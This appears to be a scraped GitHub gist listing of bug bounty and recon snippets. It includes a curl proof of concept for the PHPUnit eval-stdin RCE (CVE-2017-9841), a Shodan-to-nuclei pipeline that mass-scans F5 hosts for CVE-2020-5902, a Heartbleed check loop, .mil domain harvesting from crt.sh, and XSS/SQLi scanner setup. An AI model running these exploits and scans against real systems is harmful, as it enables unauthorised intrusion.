Skip to content

Instantly share code, notes, and snippets.

View xElkomy's full-sized avatar
🎯
Focusing

Khaled Mohamed xElkomy

🎯
Focusing
138 followers · 264 following
View GitHub Profile
@keerok
keerok / README.md
Last active October 17, 2021 14:51
client-side prototype pollution gadget using cross-origin embedded reddit posts
@cyberheartmi9
cyberheartmi9 / 🔥Complete Bug Bounty Cheat Sheet🔥
Last active March 3, 2025 21:39
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
@PatrikFehrenbach
PatrikFehrenbach / Amass Config
Created September 23, 2020 15:43
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@yassineaboukir
yassineaboukir / gist:1501de6f60dce148824d3001e83fb263
Created September 10, 2020 11:17
PHPunit RCE PoC (CVE-2017-9841)
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/
@0xatul
0xatul / grabdomains.rb
Created August 27, 2020 12:04
Grab dod root domains inscope of DOD, written by dee-see
require 'open3'
require 'net/http'
require 'nokogiri'
require 'parallel'
# Requires the nokogiri gem (`gem install nokogiri`), the parallel gem (`gem install parallel`) and the psql client for PostgreSQL.
def crtsh
Open3.pipeline_rw 'psql -t -h crt.sh -p 5432 -U guest certwatch', "sed -e 's:^ *::g' -e 's:^*\\.::g' -e '/^$/d'", 'sort -u', "sed -e 's:*.::g'" do |i, o, t|
i.write("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.mil'));")
@LuD1161
LuD1161 / f5_here_i_come.sh
Last active March 8, 2022 02:52
F5 Slapdash attempt
# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt
cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt
cut -d" " -f3 results.txt > targets.txt
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace
interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt
@lopestom
lopestom / Make A TWRP Tree For Your Device & Build.md
Created June 27, 2020 22:22 — forked from rokibhasansagar/Make A TWRP Tree For Your Device & Build.md
@Sturtuk
Sturtuk / extract_mapjs.php
Created June 24, 2020 02:44
Extract source code & directories from the javascript .map files
<?php
/**
* Created by PhpStorm.
* User: edwinsturt
* Date: 2020-06-24
* Time: 00:45
*/
$file = 'main.ff0058ad.js.map';
@imran-parray
imran-parray / heartbleed.sh
Created June 23, 2020 08:41
cat temp.txt| while read line ; do echo "QUIT"|openssl s_client -connect $line:443 2>&1|grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
@dwisiswant0
dwisiswant0 / .bash_profile
Created May 27, 2020 07:38
SQLi & XSS Vulnerability Scanner
###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###
gauq() {